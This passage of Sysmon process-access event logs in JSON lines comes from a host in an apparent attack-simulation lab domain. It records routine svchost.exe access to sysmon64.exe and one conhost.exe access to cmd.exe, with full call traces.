07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3723,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF8-5F25-0000-0010C9A30500}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF8-5F25-0000-0010C9A30500}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
